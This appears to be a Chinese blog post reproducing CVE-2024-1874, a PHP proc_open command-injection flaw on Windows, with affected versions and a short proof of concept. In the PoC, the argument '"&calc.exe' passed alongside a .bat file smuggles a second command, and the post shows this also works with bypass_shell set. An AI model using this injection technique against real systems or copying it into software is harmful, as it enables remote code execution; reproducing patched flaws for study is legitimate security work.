PHP命令执行漏洞CVE-2024-1874复现

本文介绍了PHP8.2.9及更低版本中的CVE-2024-1874漏洞,允许攻击者通过proc_open函数执行恶意代码,包括调用外部程序如计算器,即使设置了bypass_shell选项。文章详细展示了漏洞利用方法和可能的修复措施。
摘要由CSDN通过智能技术生成

CVE-2024-1874 PHP命令执行漏洞

影响版本

Affected versions
< 8.1.28
< 8.2.18
< 8.3.5
Patched versions
8.1.28
8.2.18
8.3.6

POC

创建一个文件test.php


<?php
$descriptorspec = [STDIN, STDOUT, STDOUT];
$proc = proc_open(["test.bat", "\"&calc.exe"], $descriptorspec, $pipes);
proc_close($proc);

随便创建一个.bat文件,如test.bat

echo test

然后在PHP 8.2.9nts版本下使用php test.php来执行test.php,成功RCE调起计算器。
在这里插入图片描述
即使在proc_open()函数中使用bypass shell选项,依旧RCE成功。

<?php
$descriptorspec = [STDIN, STDOUT, STDOUT];
$proc = proc_open(["test.bat", "\"&calc.exe"], $descriptorspec, $pipes, null, null, array("bypass_shell" => true));
proc_close($proc);

在这里插入图片描述

参考链接

https://mp.weixin.qq.com/s/jAeRY-XOKw8fmUDXT2ESNQ

  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值